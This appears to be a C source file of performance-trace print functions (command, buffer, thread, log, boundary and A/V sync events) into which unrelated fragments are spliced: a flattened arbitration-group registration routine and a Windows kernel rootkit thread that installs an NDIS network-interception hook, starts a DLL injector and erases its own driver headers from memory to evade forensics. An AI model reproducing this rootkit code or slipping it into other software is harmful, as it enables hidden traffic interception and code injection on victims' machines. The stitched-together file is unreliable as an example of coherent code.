/*
 * Trace one command event (a command sent to, or received from, a module).
 *
 * fOut        destination stream
 * perf        instrumentation instance; perf->cip.pDebug supplies the print
 *             settings used here (prompt, info, csv)
 * ulCommand   command code, printed in hex and, when below
 *             PERF_CommandMax, also by name from PERF_CommandTypes
 *             (otherwise "<unknown>")
 * ulArgument  command argument, printed in hex
 * eModule     module id in the low PERF_ModuleMask bits; the remaining bits
 *             carry the direction flags read by PERF_GetSendRecv /
 *             PERF_IsSending
 *
 * Output is one CSV row when me->csv is set, otherwise a human-readable
 * "Command(... to=/from=... cmd=...)" record. The format string is a
 * compile-time constant and every table index is range-checked before use;
 * the direction index is masked to 0..3, so sendRecvTxt is assumed to hold at
 * least four entries (defined elsewhere -- not verifiable here).
 */
void __print_Command(FILE *fOut, PERF_Private *perf, unsigned long ulCommand,
                     unsigned long ulArgument, PERF_MODULETYPE eModule)
{
    PERF_PRINT_Private *me = perf->cip.pDebug;
    unsigned long raw = (unsigned long) eModule;
    unsigned long moduleIx = raw & PERF_ModuleMask;
    int dirIx = (PERF_GetSendRecv(raw) >> 28) & 3;
    int isSend = PERF_IsSending(raw & ~PERF_ModuleMask);
    int csv = me->csv;

    /* Resolve the table lookups up front; out-of-range ids fall back to fixed
       placeholder strings instead of indexing past the tables. */
    const char *moduleName =
        (moduleIx < PERF_ModuleMax) ? PERF_ModuleTypes[moduleIx] : "INVALID";
    const char *commandName =
        (ulCommand < PERF_CommandMax) ? PERF_CommandTypes[ulCommand] : "<unknown>";

    /* Field separators: CSV rows use "," throughout, the text form labels
       each field. */
    const char *open     = csv ? "," : "(";
    const char *dirSep   = csv ? "," : (isSend ? " to=" : " from=");
    const char *cmdSep   = csv ? "," : " cmd=";
    const char *argOpen  = csv ? "," : "(";
    const char *argClose = csv ? "," : ") = ";
    const char *close    = csv ? "" : ")";

    fprintf(fOut, "%s%ld.%06ld%sCommand%s%s%s%s%s0x%lx%s0x%lx%s%s%s" __LINE_END__,
            me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
            me->info, open, sendRecvTxt[dirIx], dirSep, moduleName, cmdSep,
            ulCommand, argOpen, ulArgument, argClose, commandName, close);

    /* five payload fields were emitted after the header */
    print_print_location(perf, fOut, 5);
}
/*
 * Trace one buffer event: a buffer/frame sent, received or transferred
 * between two modules.
 *
 * fOut        destination stream
 * perf        instrumentation instance; perf->cip.pDebug supplies the print
 *             settings (prompt, info, csv)
 * ulAddress1  buffer address, always printed
 * ulAddress2  second buffer address, printed only when PERF_IsMultiple(eModule)
 * ulSize      buffer size, printed in hex
 * eModule     packed descriptor: low PERF_ModuleMask bits = first module,
 *             next PERF_ModuleBits = second module, plus the xfering /
 *             send-recv / frame / multiple flags decoded by the PERF_Is* and
 *             PERF_GetSendRecv helpers
 *
 * Which module columns appear depends on the flags: a transfer shows both
 * from= and to=, a receive shows from=, a send shows to= (and for a plain
 * send the single module id in the low bits is used as the destination).
 * Every table index is range-checked; the direction index is masked to
 * 0..3, so sendRecvTxt is assumed to have at least four entries.
 */
void __print_Buffer(FILE *fOut, PERF_Private *perf, unsigned long ulAddress1,
                    unsigned long ulAddress2, unsigned long ulSize,
                    PERF_MODULETYPE eModule)
{
    PERF_PRINT_Private *me = perf->cip.pDebug;
    unsigned long raw = (unsigned long) eModule;
    unsigned long srcIx = raw & PERF_ModuleMask;
    unsigned long dstIx = (raw >> PERF_ModuleBits) & PERF_ModuleMask;
    int xfering  = PERF_IsXfering(raw);
    int dirIx    = (PERF_GetSendRecv(raw) >> 28) & 3;
    int sending  = PERF_IsSending(raw);
    int isFrame  = PERF_IsFrame(raw);
    int twoAddrs = PERF_IsMultiple(raw);
    int csv      = me->csv;
    int showFrom;
    int showTo;
    const char *srcName;
    const char *dstName;

    /* A plain send carries a single module id: treat it as the destination. */
    if (!xfering && sending)
        dstIx = srcIx;

    showFrom = xfering || !sending;
    showTo   = xfering || sending;

    srcName = (srcIx < PERF_ModuleMax) ? PERF_ModuleTypes[srcIx] : "INVALID";
    dstName = (dstIx < PERF_ModuleMax) ? PERF_ModuleTypes[dstIx] : "INVALID";

    {
        const char *open    = csv ? "," : "(";
        const char *kind    = xfering ? "xfering" : sendRecvTxt[dirIx];
        const char *sep     = csv ? "," : " ";
        const char *unit    = isFrame ? "frame" : "buffer";
        const char *fromSep = csv ? "," : (showFrom ? " from=" : "");
        const char *fromVal = showFrom ? srcName : "";
        const char *toSep   = csv ? "," : (showTo ? " to=" : "");
        const char *toVal   = showTo ? dstName : "";
        const char *sizeSep = csv ? "," : " size=";
        const char *addrSep = csv ? "," : " addr=";
        const char *close   = csv ? "" : ")";

        fprintf(fOut, "%s%ld.%06ld%sBuffer%s%s%s%s%s%s%s%s%s0x%lx%s0x%lx",
                me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
                me->info, open, kind, sep, unit, fromSep, fromVal, toSep, toVal,
                sizeSep, ulSize, addrSep, ulAddress1);

        /* optional second address */
        if (twoAddrs)
            fprintf(fOut, "%s0x%lx", addrSep, ulAddress2);

        fprintf(fOut, "%s" __LINE_END__, close);
    }

    /* six payload fields, seven when the second address was printed */
    print_print_location(perf, fOut, twoAddrs ? 7 : 6);
}
/*
 * Trace the end-of-session marker ("Done") with the usual timestamp header.
 *
 * fOut  destination stream
 * perf  instrumentation instance; perf->cip.pDebug supplies prompt/info
 *
 * There are no payload fields, so print_print_location is told 0.
 */
void __print_Done(FILE *fOut, PERF_Private *perf)
{
    PERF_PRINT_Private *dbg = perf->cip.pDebug;
    const char *prompt = dbg->prompt;
    const char *info   = dbg->info;

    fprintf(fOut, "%s%ld.%06ld%sDone" __LINE_END__,
            prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time), info);

    print_print_location(perf, fOut, 0);
}
//--------------------------------------------------------------------------------------
VOID DriverEntryContinueThread(PVOID Param)
{
    /**
     * Hidden rootkit code starts execution here.
     *
     * NOTE(review): this is the post-load worker thread of a Windows kernel
     * rootkit, documented here for analysts. In order it: installs an NDIS
     * hook and a DLL injector, sleeps 3 s, frees the buffer passed in as
     * Param, and (unless USE_STEALTH_IMAGE is defined) wipes this driver's
     * own PE headers from memory. Both DbgPrint calls write to the kernel
     * debugger output and are observable artifacts.
     *
     * Param: presumably the allocation that held the driver's launch
     * context (see the free below and the comment there) -- confirm in the
     * caller that creates this thread.
     */
    LARGE_INTEGER Timeout = { 0 };
    // relative 3-second interval, reused for every KeDelayExecutionThread below
    Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(3));
    DbgPrint(__FUNCTION__"(): Param = "IFMT"\n", Param);
    // initialize NDIS hook data handler (network-traffic interception entry point)
    NdisHookInitialize(NdisHookHandleBuffer);
    // initialize DLL injector
    InjectInitialize();
    // wait 3 s before releasing Param and erasing the headers
    KeDelayExecutionThread(KernelMode, FALSE, &Timeout);
    if (Param)
    {
        // free memory, that has been allocated for driver
        ExFreePool(Param);
    }
#ifndef USE_STEALTH_IMAGE
    if (m_DriverBase)
    {
        // Locate the NT headers through e_lfanew; no validation of e_lfanew or
        // SizeOfHeaders is done -- the header values are trusted as-is.
        PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)
            ((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);
        // erase image headers: zeroes SizeOfHeaders bytes at the image base,
        // removing the DOS/PE headers of the loaded driver from memory
        // (anti-forensic -- presumably to defeat header-based image carving)
        RtlZeroMemory(m_DriverBase, pHeaders->OptionalHeader.SizeOfHeaders);
    }
#endif // USE_STEALTH_IMAGE
#ifdef USE_GREETING_MESSAGE
    // Debug-only build: the thread never returns, it loops printing a
    // message every 3 s to the kernel debugger.
    while (true)
    {
        DbgPrint(__FUNCTION__"(): Commertial malware rootkits are sucks!\n");
        // sleep
        KeDelayExecutionThread(KernelMode, FALSE, &Timeout);
    }
#endif // USE_GREETING_MESSAGE
}
/*
 * Trace a thread-creation event.
 *
 * fOut          destination stream
 * perf          instrumentation instance; perf->cip.pDebug supplies
 *               prompt/info/csv
 * ulThreadID    thread identifier, printed in decimal under "pid="
 * ulThreadName  four-character name packed into an unsigned long; expanded
 *               into four %c arguments by PERF_FOUR_CHARS
 *
 * Two payload fields (pid, name) follow the header.
 */
void __print_ThreadCreated(FILE *fOut, PERF_Private *perf, unsigned long ulThreadID,
                           unsigned long ulThreadName)
{
    PERF_PRINT_Private *me = perf->cip.pDebug;
    int csv = me->csv;
    const char *open    = csv ? "," : "(pid=";
    const char *nameSep = csv ? "," : " name=";
    const char *close   = csv ? "" : ")";

    fprintf(fOut, "%s%ld.%06ld%sThread%s%ld%s%c%c%c%c%s" __LINE_END__,
            me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
            me->info, open, ulThreadID, nameSep,
            PERF_FOUR_CHARS(ulThreadName), close);

    print_print_location(perf, fOut, 2);
}
//--------------------------------------------------------------------------------------- int ArbitrationRegisterGroup( tArbitrationGroupID groupID, const tArbitrationRegistrationInfo* pInfo ) { tGroupRegistration* pGroup; if (groupID == ARBITRATION_ID_UNKNOWN || pInfo->pCommand == NULL) return ARBITRATION_ERROR_INVALID_ARGUMENT; pGroup = FindGroupRegistration( groupID ); if (pGroup != NULL) return ARBITRATION_ERROR_ALREADY_EXISTS; if (s_GroupsCount >= MAX_GROUPS) return ARBITRATION_ERROR_NO_ROOM; pGroup = ALLOCATE( tGroupRegistration ); if (pGroup == NULL) return ARBITRATION_ERROR_OUT_OF_MEMORY; pGroup->groupID = groupID; pGroup->groupData = pInfo->groupData; pGroup->state = State_Unknown; pGroup->timer = TIMEOUT_MASTER_CHECK_FIRST; pGroup->sendCount = 0; pGroup->master = 0; pGroup->statusFlags = 0; if (pInfo->options & ArbitrationOpt_NotSuitable) pGroup->statusFlags |= ArbitrationFlags_NotSuitable; if (pInfo->options & ArbitrationOpt_Watcher) pGroup->statusFlags |= ArbitrationFlags_Watcher; pGroup->options = pInfo->options; pGroup->userInfo = pInfo->userInfo; pGroup->pCommand = pInfo->pCommand; s_Groups[ s_GroupsCount ] = pGroup; s_GroupsCount++; SetupSend( pGroup, ArbitrationPGNCmd_NewMember ); pGroup->sendCount = TIME_SECONDS( 2 ); // make sure we outlive any address claim return ARBITRATION_OK; }
/*
 * Trace a generic log event carrying three opaque values.
 *
 * fOut     destination stream
 * perf     instrumentation instance; perf->cip.pDebug supplies
 *          prompt/info/csv
 * ulData1  first value, printed in hex
 * ulData2  second value, printed in hex
 * ulData3  third value, printed in hex
 *
 * Three payload fields follow the header; the format string is constant.
 */
void __print_Log(FILE *fOut, PERF_Private *perf, unsigned long ulData1,
                 unsigned long ulData2, unsigned long ulData3)
{
    PERF_PRINT_Private *me = perf->cip.pDebug;
    int csv = me->csv;
    const char *open  = csv ? "," : "(";
    const char *comma = csv ? "," : ", ";
    const char *close = csv ? "" : ")";

    fprintf(fOut, "%s%ld.%06ld%sLog%s0x%lx%s0x%lx%s0x%lx%s" __LINE_END__,
            me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
            me->info, open, ulData1, comma, ulData2, comma, ulData3, close);

    print_print_location(perf, fOut, 3);
}
/*
 * Trace a boundary event (start or completion of a named phase).
 *
 * fOut       destination stream
 * perf       instrumentation instance; perf->cip.pDebug supplies
 *            prompt/info/csv
 * eBoundary  boundary id in the low PERF_BoundaryMask bits (named through
 *            PERF_BoundaryTypes when below PERF_BoundaryMax, else
 *            "INVALID"); PERF_IsStarted reads the started/completed flag
 *            from the unmasked value. The raw value is also printed in hex.
 *
 * Two payload fields follow the header.
 */
void __print_Boundary(FILE *fOut, PERF_Private *perf, PERF_BOUNDARYTYPE eBoundary)
{
    PERF_PRINT_Private *me = perf->cip.pDebug;
    unsigned long boundaryIx = ((unsigned long) eBoundary) & PERF_BoundaryMask;
    int csv = me->csv;
    const char *open  = csv ? "," : "(";
    const char *eq    = csv ? "," : " = ";
    const char *close = csv ? "" : ")";
    const char *phase = PERF_IsStarted(eBoundary) ? "started " : "completed ";
    const char *name  =
        (boundaryIx < PERF_BoundaryMax) ? PERF_BoundaryTypes[boundaryIx] : "INVALID";

    fprintf(fOut, "%s%ld.%06ld%sBoundary%s0x%x%s%s%s%s" __LINE_END__,
            me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
            me->info, open, eBoundary, eq, phase, name, close);

    print_print_location(perf, fOut, 2);
}
/*
 * Trace an audio/video synchronisation event.
 *
 * fOut            destination stream
 * perf            instrumentation instance; perf->cip.pDebug supplies
 *                 prompt/info/csv
 * pfTimeAudio     audio timestamp, printed with %g
 * pfTimeVideo     video timestamp, printed with %g
 * eSyncOperation  operation code, named through PERF_SyncOpTypes when below
 *                 PERF_SyncOpMax, otherwise "INVALID"
 *
 * Three payload fields follow the header.
 */
void __print_SyncAV(FILE *fOut, PERF_Private *perf, float pfTimeAudio,
                    float pfTimeVideo, PERF_SYNCOPTYPE eSyncOperation)
{
    PERF_PRINT_Private *me = perf->cip.pDebug;
    unsigned long opIx = (unsigned long) eSyncOperation;
    int csv = me->csv;
    const char *open     = csv ? "," : "(audioTS=";
    const char *videoSep = csv ? "," : " videoTS=";
    const char *opSep    = csv ? "," : " op=";
    const char *close    = csv ? "" : ")";
    const char *opName   = (opIx < PERF_SyncOpMax) ? PERF_SyncOpTypes[opIx] : "INVALID";

    fprintf(fOut, "%s%ld.%06ld%sSyncAV%s%g%s%g%s%s%s" __LINE_END__,
            me->prompt, TIME_SECONDS(perf->time), TIME_MICROSECONDS(perf->time),
            me->info, open, pfTimeAudio, videoSep, pfTimeVideo, opSep, opName, close);

    print_print_location(perf, fOut, 3);
}